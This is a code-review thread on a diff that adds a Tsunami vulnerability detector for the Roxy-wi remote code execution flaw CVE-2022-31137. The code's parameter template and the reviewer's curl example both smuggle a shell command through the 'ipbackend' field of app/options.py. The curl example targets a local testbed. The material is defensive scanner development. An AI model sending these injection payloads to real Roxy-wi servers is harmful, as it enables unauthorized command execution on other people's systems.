community/detectors/roxy_wi_cve_2022_31137/src/main/java/com/google/tsunami/plugins/detectors/cves/cve202231137/Cve202231137Detector.java

```diff
@@ -0,0 +1,208 @@
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+package com.google.tsunami.plugins.detectors.cves.cve202231137;
+
+import static com.google.common.base.Preconditions.checkNotNull;
+import static com.google.common.collect.ImmutableList.toImmutableList;
+import static com.google.common.net.HttpHeaders.CONTENT_TYPE;
+import static com.google.tsunami.common.net.http.HttpRequest.get;
+import static com.google.tsunami.common.net.http.HttpRequest.post;
+
+import com.google.common.annotations.VisibleForTesting;
+import com.google.common.collect.ImmutableList;
+import com.google.common.flogger.GoogleLogger;
+import com.google.protobuf.ByteString;
+import com.google.protobuf.util.Timestamps;
+import com.google.tsunami.common.data.NetworkServiceUtils;
+import com.google.tsunami.common.net.http.HttpClient;
+import com.google.tsunami.common.net.http.HttpHeaders;
+import com.google.tsunami.common.net.http.HttpResponse;
+import com.google.tsunami.common.time.UtcClock;
+import com.google.tsunami.plugin.PluginType;
+import com.google.tsunami.plugin.VulnDetector;
+import com.google.tsunami.plugin.annotations.PluginInfo;
+import com.google.tsunami.plugin.payload.Payload;
+import com.google.tsunami.plugin.payload.PayloadGenerator;
+import com.google.tsunami.proto.DetectionReport;
+import com.google.tsunami.proto.DetectionReportList;
+import com.google.tsunami.proto.DetectionStatus;
+import com.google.tsunami.proto.NetworkService;
+import com.google.tsunami.proto.PayloadGeneratorConfig;
+import com.google.tsunami.proto.Severity;
+import com.google.tsunami.proto.TargetInfo;
+import com.google.tsunami.proto.Vulnerability;
+import com.google.tsunami.proto.VulnerabilityId;
+import java.io.IOException;
+import java.net.URLEncoder;
+import java.nio.charset.StandardCharsets;
+import java.time.Clock;
+import java.time.Instant;
+import java.util.Optional;
+import javax.inject.Inject;
+
+/** A {@link VulnDetector} that detects Roxy-wi RCE CVE-2022-31137. */
+@PluginInfo(
+    type = PluginType.VULN_DETECTION,
+    name = "Roxy-wi RCE CVE-2022-31137 Detector",
+    version = "0.1",
+    description = "This detector checks Roxy-wi RCE (CVE-2022-31137)",
+    author = "am0o0",
+    bootstrapModule = Cve202231137DetectorBootstrapModule.class)
+public final class Cve202231137Detector implements VulnDetector {
+  private static final GoogleLogger logger = GoogleLogger.forEnclosingClass();
+  @VisibleForTesting static final String VULNERABLE_REQUEST_PATH = "app/options.py";
+  private static final String HTTP_PARAMETERS =
+      "alert_consumer=1&serv=127.0.0.1&ipbackend=\";%s+##&backend_server=127.0.0.1";

```

Comment:
I was able to reproduce the vulnerability using only these parameters: `alert_consumer` and `ipbackend`. Can the others be removed or is there a reason to keep them?
The only difference I noticed is that the response contains a trailing `<br>` when omitting the `backend_server` parameter. 

You can try this with the following command against the [relative vulnerable testbed](https://github.com/google/security-testbeds/pull/105):
`curl -X POST "https://localhost/app/options.py" --data "alert_consumer=1&ipbackend=\";id+#" --insecure`

```suggestion
      "alert_consumer=1&ipbackend=\";%s+#";

```